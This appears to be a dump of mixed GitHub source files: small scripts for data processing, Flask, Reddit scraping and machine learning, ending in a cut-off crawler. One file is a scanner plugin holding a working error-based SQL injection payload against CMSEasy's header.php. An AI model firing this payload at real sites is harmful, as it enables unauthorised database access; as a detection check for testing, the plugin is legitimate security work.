l1:\n :return:\n \"\"\"\n n, set1, set2, set3, cont, l2 = 0, {(), 1}, {(), 1}, {()}, 0, []\n set1.discard(())\n set2.discard(())\n set3.discard(())\n while n < 8:\n for i in range(0, len(l1)):\n for k in range(0, len(l1[i])):\n a = l1[i][k]\n c = a\n c = c + 1\n print(c)\n for m in range(2, 100_000):\n while c % m == 0 and m != c:\n c /= m\n set1.add(k)\n n += 1\n n = 0\n while n < 8:\n for i in range(0, len(l1)):\n for k in range(0, len(l1[i])):\n b = l1[i][k]\n d = b\n d += 1\n for m in range(2, 100_000):\n while d % m == 0 and m != d:\n d /= m\n set2.add(m)\n n += 1\n set3 = set1.intersection(set2)\n cont = len(set3)\n l2.append(cont)\n return print(*l2)\n\n\ncountTheCommonFactors(stringToInteger())\n","repo_name":"Curio5813/CodeAbbey","sub_path":"problem315.py","file_name":"problem315.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29142530822","text":"\n# include the flask library\nfrom flask import Flask, render_template, request, redirect, url_for, flash, json, jsonify\nfrom flask_restful import Resource, Api\n# from flask_cors import CORS\nimport requests\n\napp = Flask(__name__)\n# CORS(app)\n\napp.secret_key = 'mysecretkey'\n\n\n@app.route('/')\ndef index():\n url = 'https://api-sportcenter.herokuapp.com/articles'\n # url = 'http://localhost:6000/articles'\n res = requests.get(url)\n data = res.json()\n print(data)\n return render_template('index.html', articles=data)\n\n\n@app.route('/add', methods=['POST'])\ndef add_article():\n if request.method == 'POST':\n article = request.form['article']\n description = request.form['description']\n price = request.form['price']\n stock = request.form['stock']\n\n url = 
'https://api-sportcenter.herokuapp.com/articles'\n # url = 'http://localhost:6000/articles'\n payload = {'article': '' + article + '', 'description': '' + description + '',\n 'price': '' + price + '', 'stock': '' + stock + ''}\n headers = {'content-type': 'application/json'}\n res = requests.post(url, data=json.dumps(payload), headers=headers)\n print(res.content)\n flash('Article Added Succesfully')\n return redirect(url_for('index'))\n\n\n@app.route('/edit/')\ndef edit_article(sku):\n req = 'https://api-sportcenter.herokuapp.com/article/' + str(sku)\n # req = 'http://localhost:6000/article/' + str(sku)\n res = requests.get(req)\n data = res.json()\n return render_template('edit_article.html', article=data)\n\n\n@app.route('/update/', methods=['POST'])\ndef update_article(sku):\n if request.method == 'POST':\n print(sku)\n\n upd_article = request.form['article']\n upd_description = request.form['description']\n upd_price = request.form['price']\n upd_stock = request.form['stock']\n req = 'https://api-sportcenter.herokuapp.com/article/' + str(sku)\n print(req)\n body = {'article': ''+str(upd_article)+'', 'description': '' +\n str(upd_description) + '', 'price': '' + str(upd_price) + '', 'stock': '' + str(upd_stock) + ''}\n print(body)\n headers = {'content-type': 'application/json'}\n res = requests.put(req, data=json.dumps(body), headers=headers)\n print(res)\n print(res.content)\n\n flash('Contact Updated Successfully')\n return redirect(url_for('index'))\n\n\n@app.route(\"/delete/\")\ndef delete_article(sku):\n req = 'https://api-sportcenter.herokuapp.com/article/' + str(sku)\n # req = 'http://localhost:6000/article/' + str(sku)\n res = requests.delete(req)\n flash('Article Deleted Succesfully')\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n app.run(port=5000, debug=False)\n","repo_name":"c3m3z4c4/HelloPyFlask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"8841375160","text":"import re\nimport sys\n\nfrom bs4 import BeautifulSoup\n\nimport url_database\nimport driver_manager\n\ndef scrape_subreddits(driver):\n subreddit_set = set()\n\n # Get the page source after scrolling\n page_source = driver.page_source\n\n # Parse the page source with BeautifulSoup as before\n soup = BeautifulSoup(page_source, \"html.parser\")\n\n # Extract the subreddit names from the href attribute and store them in a set\n a_tags = soup.find_all(\"a\", class_=\"absolute inset-0\")\n for a_tag in a_tags:\n href = a_tag.get(\"href\")\n match = re.search(r'/r/([^/]+)/', href)\n if match:\n subreddit_set.add('/r/' + match.group(1))\n\n return subreddit_set\n\n# Class for crawling home page to get subreddits\n\n\nclass HomePageCrawler():\n def __init__(self, scroll_number: int, threads=1):\n self.scroll_number = scroll_number\n self.threads = threads\n\n self.database = url_database.URLDatabase('seen_subs')\n self.chrome_driver = driver_manager.ParralelDriverManager(self.threads)\n\n\n # scrape more URLs\n def scrape(self) -> set:\n self.chrome_driver.populate_url_pool(['https://reddit.com']*self.threads)\n\n self.chrome_driver.parallel_url_task(self.chrome_driver.scroll_and_wait, self.scroll_number)\n\n self.chrome_driver.populate_url_pool(['https://reddit.com']*self.threads)\n\n current = self.chrome_driver.parallel_url_task(scrape_subreddits)\n\n print(current)\n\n self.chrome_driver.stop_drivers()\n\n self.database.set_current(current)\n\n 
subreddits = self.database.get_unique()\n\n if not subreddits:\n clear = input(\"Cannot find any unique subreddits, type y to clear cache & retry: \")\n if clear == 'y':\n self.database.clear()\n subreddits = self.database.get_unique()\n else:\n sys.exit()\n return subreddits\n","repo_name":"Qiwi2681/fra-scraper","sub_path":"home_scraper.py","file_name":"home_scraper.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37428736838","text":"\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nname: cmseasy header.php 报错注入\nreferer: http://www.wooyun.org/bugs/wooyun-2015-0137013\nauthor: Lucifer\ndescription: 文件/coupon/s.php中,参数fids存在SQL注入。\n'''\nimport sys\nimport json\nimport requests\n\n\n\nclass cmseasy_header_detail_sqli_BaseVerify:\n def __init__(self, url):\n self.url = url\n\n def run(self):\n headers = {\n \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n post_data = {\n \"xajax\":\"Postdata\",\n \"xajaxargs[0]\":\"detail=xxxxxx'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(1=1,md5(1234)))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'1'='1\",\n }\n payload = \"/celive/live/header.php\"\n vulnurl = self.url + payload\n try:\n req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)\n if r\"81dc9bdb52d04dc20036dbd8313ed055\" in req.text:\n return \"[+]存在cmseasy header.php 报错注入漏洞...(高危)\\tpayload: \"+vulnurl+\"\\npost: \"+json.dumps(post_data, indent=4)\n\n except:\n return \"[-]connect timeout\"\n\nif __name__ == \"__main__\":\n\n testVuln = cmseasy_header_detail_sqli_BaseVerify(sys.argv[1])\n testVuln.run()","repo_name":"iceyhexman/onlinetools","sub_path":"scanner/plugins/cms/cmseasy/cmseasy_header_detail_sqli.py","file_name":"cmseasy_header_detail_sqli.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1626,"dataset":"github-code","pt":"6"} +{"seq_id":"32506846523","text":"import json\nimport os\n\n\nclass Cache():\n \"\"\"Cache handler\n\n Saves and retrieves a data dictionary to a cache file. 
Supports dot\n notation to get and set dictionary fields.\n\n \"\"\"\n\n def __init__(self, cfg_dir, filename=\".cache\"):\n \"\"\"Cache constructor\n\n Args:\n cfg_dir : Directory where the .update is located/created\n\n \"\"\"\n self.path = os.path.join(cfg_dir, filename)\n self.data = {}\n self.load()\n\n def load(self):\n \"\"\"Load data from the cache file\"\"\"\n if (not os.path.exists(self.path)):\n return\n\n try:\n with open(self.path, 'r') as fd:\n self.data = json.load(fd)\n except json.decoder.JSONDecodeError:\n return\n\n def save(self):\n \"\"\"Save data into the cache file\n\n Args:\n cli_update : Version of a new CLI version available for update,\n if any\n\n \"\"\"\n with open(self.path, 'w') as fd:\n json.dump(self.data, fd)\n\n def get(self, field):\n \"\"\"Get using dot notation\"\"\"\n nested_keys = field.split('.')\n tmp = self.data\n for i, key in enumerate(nested_keys):\n if key not in tmp:\n return None\n if i == len(nested_keys) - 1:\n return tmp[key]\n tmp = tmp[key]\n\n def set(self, field, val, overwrite=True):\n \"\"\"Set using dot notation\"\"\"\n nested_keys = field.split('.')\n tmp = self.data\n for i, key in enumerate(nested_keys):\n if key not in tmp:\n tmp[key] = {}\n if i == len(nested_keys) - 1:\n if (key in tmp and not overwrite):\n return\n tmp[key] = val\n tmp = tmp[key]\n","repo_name":"Blockstream/satellite","sub_path":"blocksatcli/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":949,"dataset":"github-code","pt":"6"} +{"seq_id":"21658089979","text":"import tensorflow as tf\nimport os\nfrom skimage.io import imread\nfrom skimage.transform import resize\nimport progressbar\n\nimport numpy as np\nfrom data.gene_label import COLOR_MAPS\nfrom PIL import Image\n\n\nclass Img(object):\n def __init__(self, img_path, label_path):\n self.img_path = img_path\n self.label_path = label_path\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef convert_to(img_list, target_dir, img_size, name=\"train\"):\n \"\"\"\n build records file\n :param img_list: a list of Img objects generated by 'parse_txt_file'\n :param target_dir: the target directory that you want to save the records file\n :param img_size: tuple (height, width)\n :param name: using to specify the record file's name. 
the generated file name is 'name.tfrecords'\n :return: Nothing\n \"\"\"\n if not isinstance(img_list, list):\n raise ValueError(\"img_list must be a list\")\n\n total_num = len(img_list)\n\n ####\n widgets = [\"processing: \", progressbar.Percentage(),\n \" \", progressbar.ETA(),\n \" \", progressbar.FileTransferSpeed(),\n ]\n bar = progressbar.ProgressBar(widgets=widgets, max_value=total_num).start()\n ####\n\n filename = os.path.join(target_dir, name + '.tfrecords')\n print('Writing', filename)\n writer = tf.python_io.TFRecordWriter(filename)\n for i, img in enumerate(img_list):\n bar.update(i)\n img_data = resize(imread(img.img_path), output_shape=img_size, mode='constant',\n preserve_range=True).astype(np.uint8)\n img_label = resize(np.array(Image.open(img.label_path), dtype=np.uint8), output_shape=img_size,\n mode='constant', order=0, preserve_range=True).astype(np.uint8)\n img_label[img_label == 255] = 0\n\n\n # img_label = semantic_img2class(img_label, color_maps)\n # height = img_data.shape[0]\n # width = img_data.shape[1]\n # depth = img_data.shape[2]\n\n # img_data [256, 256, 3], label [256, 256]\n img_data_raw = img_data.tostring()\n img_label_raw = img_label.tostring()\n example = tf.train.Example(features=tf.train.Features(feature={\n 'height': _int64_feature(img_size[0]),\n 'width': _int64_feature(img_size[1]),\n 'depth': _int64_feature(3),\n 'label': _bytes_feature(img_label_raw),\n 'image_raw': _bytes_feature(img_data_raw)}))\n writer.write(example.SerializeToString())\n writer.close()\n bar.finish()\n print(\"done\")\n\n\ndef semantic_img2class(img, color_maps):\n if not isinstance(img, np.ndarray):\n raise ValueError(\"img must be ndarray, not the %s\" % type(img))\n labels = []\n height, width, _ = img.shape\n for i in range(height):\n row_label = []\n for j in range(width):\n color = list(img[i, j])\n label = color_maps.index(color)\n row_label.append(label)\n labels.append(row_label)\n\n labels = np.array(labels).astype(np.uint8)\n return labels\n\n\ndef suffix_png2jpg(name):\n name, suffix = name.split('.')\n name += '.jpg'\n return name\n\n\ndef generate_Img_list(img_dir, label_dir):\n labels = os.listdir(label_dir)\n labels_abs_path = [os.path.join(label_dir, label) for label in labels]\n imgs_abs_path = [os.path.join(img_dir, suffix_png2jpg(img)) for img in labels]\n num_data = len(labels)\n Img_list = []\n for i, img_path in enumerate(imgs_abs_path):\n img_obj = Img(img_path, label_path=labels_abs_path[i])\n Img_list.append(img_obj)\n print(\"number of data %d\" % num_data)\n return Img_list\n\n\ndef main():\n img_dir = '/media/fanyang/workspace/DataSet/VOCdevkit/VOC2012/JPEGImages'\n label_dir = '/media/fanyang/workspace/DataSet/VOCdevkit/VOC2012/SegmentationClass'\n target_dir = '/media/fanyang/workspace/DataSet/VOCdevkit/VOC2012'\n NUM_DATA = 2913\n Img_list = generate_Img_list(img_dir=img_dir, label_dir=label_dir)\n convert_to(img_list=Img_list, target_dir=target_dir, img_size=(256, 256),\n name=\"semantic_2012_train\")\n pass\n\n\n# image size [256, 256, 3]\n\nif __name__ == '__main__':\n main()\n","repo_name":"keithyin/FCN-tf","sub_path":"data/generate_records.py","file_name":"generate_records.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32331044263","text":"import numpy as np\nfrom helper_functions import print_msg\nimport const\nimport conv\n\n#A simple struct to hold info about single halo\nclass Halo:\n\t'''\n\tA simple struct to hold info about 
a single halo\n\t'''\n\tdef __init__(self):\n\t\tself.pos = (0.0, 0.0, 0.0) #Position in grid points\n\t\tself.pos_cm = (0.0, 0.0, 0.0) #Center of mass position in grid points\n\t\tself.vel = (0.0, 0.0, 0.0) #Velocity in simulation units\n\t\tself.l = (0.0, 0.0, 0.0) #Angular momentum in simulation units\n\t\tself.vel_disp = 0.0 #Velocity dispersion in simulation units\n\t\tself.r = 0.0 #Virial radius in grid units\n\t\tself.m = 0.0 #Grid mass\n\t\tself.mp = 0 #Number of particles\n\t\tself.solar_masses = 0.0 #Mass in solar masses\n\n\nclass HaloList:\n\t'''\n\tA class that holds information about a large number of halos, as read from a \n\thalo list file.\n\tContains methods to select halos based on different criteria. This file is very slow\n\tif you need to read a large number of halos.\n\t\n\tTODO: write a better implementation of this class.\n\t'''\n\tdef __init__(self, filename=None, min_select_mass = 0.0, max_select_mass = None, \n\t\t\tmax_select_number=-1, startline = 0):\n\t\t'''\n\t\tInitialize the object. If filename is given, read the file. Otherwise,\n\t\tdo nothing.\n\t\t\n\t\tParameters:\n\t\t\t* filename = None (string): The file to read from\n\t\t\t* min_select_mass = 0.0 (float): The lower threshold mass in solar masses.\n\t\t\t\tOnly halos above this mass will be read.\n\t\t\t* max_select_mass = None (float): The upper threshold mass in solar masses.\n\t\t\t\tOnly halos below this mass will be read. If None, there is no limit.\n\t\t\t* max_select_number = -1 (int): The max number of halos to read. If -1, there\n\t\t\t\tis no limit.\n\t\t\t* startline = 0 (int): The line in the file where reading will start.\n\t\tReturns:\n\t\t\tNothing\n\t\t'''\n\t\tself.halos = []\n\n\t\tif filename:\n\t\t\tself.read_from_file(filename, min_select_mass, max_select_mass, max_select_number, \n\t\t\t\t\tstartline)\n\n\tdef read_from_file(self,filename, min_select_mass = 0.0, max_select_mass = None, max_select_number=-1, \n\t\t\tstartline=0):\n\t\t'''\n\t\tRead a halo list.\n\t\t\n\t\tParameters:\n\t\t\t* filename (string): The file to read from\n\t\t\t* min_select_mass = 0.0 (float): The lower threshold mass in solar masses.\n\t\t\t\tOnly halos above this mass will be read.\n\t\t\t* max_select_mass = None (float): The upper threshold mass in solar masses.\n\t\t\t\tOnly halos below this mass will be read. If None, there is no limit.\n\t\t\t* max_select_number = -1 (int): The max number of halos to read. If -1, there\n\t\t\t\tis no limit.\n\t\t\t* startline = 0 (int): The line in the file where reading will start.\n\t\tReturns:\n\t\t\tTrue if all the halos were read. False otherwise.\n\t\t'''\n\n\t\tself.halos = []\n\n\t\tprint_msg('Reading halo file %s...' 
% filename)\n\t\tself.filename = filename\n\t\timport fileinput\n\n\t\t#Store the redshift from the filename\n\t\timport os.path\n\t\tname = os.path.split(filename)[1]\n\t\tself.z = float(name.split('halo')[0])\n\n\t\t#Read the file line by line, since it's large\n\t\tlinenumber = 1\n\t\tmin_select_grid_mass = min_select_mass/(conv.M_grid*const.solar_masses_per_gram)\n\t\tif max_select_mass:\n\t\t\tprint_msg('Max_select_mass: %g' % max_select_mass)\n\t\t\tmax_select_grid_mass = max_select_mass/(conv.M_grid*const.solar_masses_per_gram)\n\n\t\tfor line in fileinput.input(filename):\n\t\t\tif linenumber < startline: #If you want to read from a particular line\n\t\t\t\tlinenumber += 1\n\t\t\t\tcontinue\n\t\t\tif max_select_number >= 0 and len(self.halos) >= max_select_number:\n\t\t\t\tfileinput.close()\n\t\t\t\treturn False\n\t\t\tif linenumber % 100000 == 0:\n\t\t\t\tprint_msg('Read %d lines' % linenumber)\n\t\t\tlinenumber += 1\n\n\t\t\tvals = line.split()\n\t\t\tgrid_mass = float(vals[-3])\n\n\t\t\t#Create a halo and add it to the list\n\t\t\tif grid_mass > min_select_grid_mass and (max_select_mass is None or grid_mass < max_select_grid_mass):\n\t\t\t\thalo = Halo()\n\t\t\t\thalo.pos = np.array(list(map(float, vals[:3])))\n\t\t\t\thalo.pos_cm = np.array(list(map(float, vals[3:6])))\n\t\t\t\thalo.vel = np.array(list(map(float, vals[6:9])))\n\t\t\t\thalo.l = np.array(list(map(float, vals[9:12])))\n\t\t\t\thalo.vel_disp = float(vals[12])\n\t\t\t\thalo.r = float(vals[13])\n\t\t\t\thalo.m = float(vals[14])\n\t\t\t\thalo.mp = float(vals[15])\n\t\t\t\thalo.solar_masses = grid_mass*conv.M_grid*const.solar_masses_per_gram\n\t\t\t\tself.halos.append(halo)\n\n\t\tfileinput.close()\n\n\t\treturn True\n","repo_name":"hjens/c2raytools","sub_path":"src/c2raytools/halo_list.py","file_name":"halo_list.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"}
{"seq_id":"15554310505","text":"from sklearn.tree import DecisionTreeClassifier\nimport pandas as pd \nfrom sklearn.metrics import accuracy_score\nimport numpy as np \n\nattributes=['buying', 'maint', 'doors', 'persons', 'lug_boot', 'safety', 'class']\n\n\ndf = pd.read_csv('ds/car_evaluation.csv')\nX = pd.get_dummies(df[attributes[0:6]])\nY = pd.get_dummies(df[attributes[6]])\nprint('one hot encoding done')\nmsk = np.random.rand(len(df)) < 0.8 #80 percent split\nprint(msk)\nX_train = X[msk]\nY_train = Y[msk]\nY_test = Y[~msk]\nX_test = X[~msk]\nprint('split done')\n\n\n\n\nclf = DecisionTreeClassifier(random_state=0)\nclf = clf.fit(X_train,Y_train)\n\nY_pred = clf.predict(X_train)\n\nprint(\"train accuracy:\")\nprint(accuracy_score(Y_train, Y_pred))\n\nY_pred = clf.predict(X_test)\n\nprint(\"test accuracy:\")\nprint(accuracy_score(Y_test, Y_pred))","repo_name":"shobhit-coder/fuzzy-decision-tree","sub_path":"decisionTreeSKLearn.py","file_name":"decisionTreeSKLearn.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"19366868963","text":"\"\"\"\ntfile1.py\nChapter 7 Cool Features of Python\nAuthor: William C. 
Gunnells\nRapid Python Programming\n\"\"\"\n\n\nwith open(\"blah.txt\", \"r\") as f:\n my_list = f.readlines()\n\n\ndef mygen(data):\n for lines in data:\n yield lines\n\n\nif __name__ == \"__main__\":\n for i in mygen(my_list):\n print(i)\n","repo_name":"thecount12/rapidpythonprogramming","sub_path":"chapter7/tfile1.py","file_name":"tfile1.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"18536579008","text":"from datetime import datetime\nstart = datetime.now()\nimport torch\nimport torch.nn as nn\nimport pytorch_lightning as pl\nfrom collections import OrderedDict\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_lightning.callbacks import RichProgressBar\nfrom natsort import natsorted\nimport glob\nimport tensorflow as tf\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint('Using device (set to GPU if available):', device)\n\ndef make_parser(): #, rna_mode\n def parse_proto(example_protos):\n \"\"\"Parse TFRecord protobuf.\"\"\"\n feature_spec = {\n 'sequence': tf.io.FixedLenFeature([], dtype = tf.string),\n 'target': tf.io.FixedLenFeature([], dtype = tf.string),\n }\n feature_tensors = tf.io.parse_single_example(example_protos, features=feature_spec)\n target = tf.io.decode_raw(feature_tensors['target'], tf.float16)\n target = tf.reshape(target, (896, 22)) ### 22 tracks\n target = tf.cast(target, tf.float32)\n return target\n return parse_proto\n\ndef file_to_records(filename):\n return tf.data.TFRecordDataset(filename, compression_type='ZLIB')\n\ndef get_target(subset = 'train'):\n tfr_path = f'/exports/humgen/idenhond/data/basenji_preprocess/output_tfr/tfrecords/{subset}*.tfr'\n tfr_files = natsorted(glob.glob(tfr_path))\n print(f'number of tfr files for {subset} subset: {len(tfr_files)}')\n dataset = tf.data.Dataset.from_tensor_slices(tfr_files)\n dataset = dataset.flat_map(file_to_records)\n dataset = dataset.map(make_parser())\n dataset = dataset.batch(1)\n\n # instead of adding targets to big array, save to seperate file in iteration\n # save to folder data/Enformer_train/Enformer_train_targets\n # targets = []\n for i, target in enumerate(dataset):\n # # target_np = target.numpy()\n # # print(type(target_np))\n # # print(target_np.shape)\n # target_tensor = torch.from_numpy(target.numpy())\n # # print(target_tensor.shape)\n # new_tensor = torch.zeros(1,896,19)\n # indices = [0, 1,2,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]\n # for x, j in enumerate(indices):\n # new_tensor[:,:,x] = target_tensor[:,:, j]\n\n # # print(new_tensor.shape)\n\n # # torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_validation/Enformer_validation_targets_newtracks2703/targets_seq{i+1}.pt')\n # # torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_test/Enformer_test_targets_newtracks2703/targets_seq{i+1}.pt')\n # torch.save(new_tensor, f'/exports/humgen/idenhond/data/Enformer_train/Enformer_train_targets_newtracks2703/targets_seq{i+1}.pt')\n # hierboven was hoe je de targets voor de new tracks only hebt opgeslage (dus verkeerd, je moet 2,3,4 overslaan bij de indices en niet 3,4,5)\n\n # nu hier: opslaan alleen oude targets uit de 22 tracks\n target_tensor = torch.from_numpy(target.numpy())\n new_tensor = torch.zeros(1,896,3)\n indices = [2,3,4]\n for x, j in enumerate(indices):\n new_tensor[:,:,x] = target_tensor[:,:, j]\n\n torch.save(new_tensor, 
f'/exports/humgen/idenhond/data/Enformer_train/Enformer_train_3tracks_remade/targets_seq{i+1}.pt')\n\n    return None\n\nget_target()\n\n\n\n\"\"\"\nthe tfr files have 22 tracks (index 0 - 21)\nindices 3,4,5 are from enformer --> those have to be taken out\n\n\"\"\"","repo_name":"icdh99/LUMC_internship_enformer_continual","sub_path":"enformer/dnn_head/train_newtracks_2703/store_target_as_tensor.py","file_name":"store_target_as_tensor.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14102686906","text":"import numpy as np\nfrom ksvd import ApproximateKSVD\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nfrom .blocks_github import extract_patches_2d, reconstruct_from_patches_2d\n\n\ndef build_ksvd(blocked, n_components=30, n_nonzero=None):\n    aksvd = ApproximateKSVD(\n        n_components=n_components, \n        # transform_n_nonzero_coefs=n_nonzero\n    )\n    dictionary = aksvd.fit(blocked).components_\n    gamma = aksvd.transform(blocked)\n    error = np.abs(gamma @ dictionary - blocked).mean()\n    # np.nonzero returns a tuple of index arrays, so count the entries of the first array\n    print('MAE: {:.3f}, Nonzero: {}'.format(error, len(np.nonzero(gamma[0])[0])))\n    return dictionary, gamma\n\ndef _get_weights(gamma):\n    tmp = (gamma != 0).sum(axis=0)\n    tmp = tmp / tmp.sum()\n    return tmp\n\ndef make_weighted_dict(dictionary, gamma, delta=8):\n    weights = _get_weights(gamma)\n    dictionary_new = dictionary * (1 + delta * weights).reshape(-1, 1)\n    return dictionary_new\n\ndef ksvd_filtering(image, patch_size=4, n_components=20, n_nonzero=None, delta=2):\n    blocked = extract_patches_2d(image, (patch_size, patch_size)).reshape(-1, patch_size ** 2)\n    mean = np.mean(blocked, axis=1)[:, np.newaxis]\n    # std = np.std(blocked, axis=1)[:, np.newaxis]\n\n    blocked = (blocked - mean)\n    D, A = build_ksvd(blocked, n_components=n_components, n_nonzero=n_nonzero)\n    D = make_weighted_dict(D, A, delta=delta)\n    patches = (A @ D + mean)\n    img_modif = reconstruct_from_patches_2d(patches.reshape(-1, patch_size, patch_size), image_size=image.shape)\n    return D, A, patches, img_modif\n","repo_name":"Alexkkir/sr-tomography","sub_path":"lib/ksvd.py","file_name":"ksvd.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28589776062","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 21 11:00:17 2021\n\n@author: SHIRISH\n\"\"\"\n\n\nimport Model as m\nimport tensorflow as tf\nimport os\nimport numpy as np\nimport Utility as u\n\n\n\n\nsampling_rate = 16000\n\nmodel = m.build_model((sampling_rate//2,1),30)\n\n#model.summary()\n\nmodel.compile(optimizer='Adam',loss='sparse_categorical_crossentropy',metrics=['accuracy'])\n\nmodel.load_weights('Speech_To_Text_model.h5')\n\nclass_names_dict ={}\ni = 0\nfor files in os.listdir('augmented_dataset'):\n    class_names_dict[i]=files\n    i+=1\n\n\naudio_path = []\nfile_name = os.path.join(\"Test\",\"9.wav\")\naudio_path.append(file_name)\nlabel =[0]\n\ntest_ds = u.GenDataset(audio_path,label)\n\nfor audio,_ in test_ds.take(1):\n    #add extra dimension to audio\n    audio = np.asarray(audio)\n    audio = audio.reshape((1,)+audio.shape)\n    audio = tf.convert_to_tensor(audio)\n    ffts = u.Fourier_transform(audio)\n    prediction = model.predict(ffts)\n    print(\"The sound predicted is 
\",class_names_dict[np.argmax(prediction)])\n","repo_name":"DoraemonSlayer69/Speech-To-Text-Convertor","sub_path":"Test_model_audio.py","file_name":"Test_model_audio.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36522276820","text":"def pfunction(s):\n n = len(s)\n p = [0] * n\n for i in range(1, n):\n k = p[i - 1]\n while k > 0 and s[i] != s[k]:\n k = p[k - 1]\n if s[i] == s[k]:\n k += 1\n p[i] = k\n return p\n \n \np = input()\nt = input()\npref = pfunction(p + \"#\" + t)\n\nres = []\nn = len(p)\nfor i in range(len(pref)):\n if pref[i] == n:\n res.append(i)\nprint(len(res))\nprint(*[i - 2 * n + 1 for i in res])\n","repo_name":"AverPower/Algorithms_and_Structures","sub_path":"14. Basic String Algorithms/Task C.py","file_name":"Task C.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"29915244041","text":"\"\"\"empty message\n\nRevision ID: 8bec726f17fb\nRevises: 9578ff987878\nCreate Date: 2020-01-22 11:38:17.886992\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8bec726f17fb'\ndown_revision = '9578ff987878'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('food',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=80), nullable=False),\n sa.Column('comment', sa.String(length=200), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=False),\n sa.Column('created_by', sa.String(length=80), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_table('food')\n    # ### end Alembic commands ###\n","repo_name":"ariesunique/food-journal","sub_path":"migrations/versions/8bec726f17fb_.py","file_name":"8bec726f17fb_.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26079860910","text":"# python3 crawling.py\r\nfrom typing import List\r\nimport praw\r\nfrom praw.models import MoreComments\r\nimport pandas as pd\r\nLIMIT = float(\"inf\") #DEBUG : change to large number\r\n\r\n# web scraping functions\r\ndef scrapePosts(post): #gets data from all posts and top-level comments in each post\r\n    list1 = [post.title, post.score, post.id, post.subreddit, post.url, post.num_comments, post.selftext, post.created]\r\n\r\n    #looping through comments of a post\r\n    submission = reddit.submission(id=post.id)\r\n    for top_level_comment in submission.comments[0:]: #Note: Comments sorted by Best\r\n        if isinstance(top_level_comment, MoreComments):\r\n            continue\r\n        list2.append(top_level_comment.body)\r\n\r\n    postList.append(list1 + list2) # append post info + comments\r\n    list2.clear()\r\n\r\ndef allSubreddit(keyword,hot): # searches all subreddits for keyword\r\n\r\n    if hot == 0:\r\n        allPosts = reddit.subreddit(\"/all\").search(keyword, limit=LIMIT)\r\n    else:\r\n        allPosts = reddit.subreddit(\"/all\").search(keyword, sort =\"hot\", limit=LIMIT)\r\n\r\n    print(\"Post Number:\")\r\n    count = 1\r\n    for post in allPosts:\r\n        scrapePosts(post)\r\n        print(count)\r\n        count = count + 1\r\n\r\ndef subredditSearch(subRed, keyword, hot): # searches specific subreddit for keyword\r\n\r\n    if hot == 0:\r\n        if keyword == \"\":\r\n            allPosts = reddit.subreddit(subRed).new(limit=LIMIT) #sorted by new\r\n        else:\r\n            allPosts = reddit.subreddit(subRed).search(keyword, limit=LIMIT) #sorted by relevance\r\n\r\n    else:\r\n        if keyword == \"\":\r\n            allPosts = reddit.subreddit(subRed).hot(limit=LIMIT)\r\n        else:\r\n            #allPosts = reddit.subreddit(subRed).hot(limit=LIMIT).search(keyword)\r\n            allPosts = reddit.subreddit(subRed).search(keyword,sort=\"hot\", limit=LIMIT)\r\n\r\n    print(\"Post Number:\")\r\n    count = 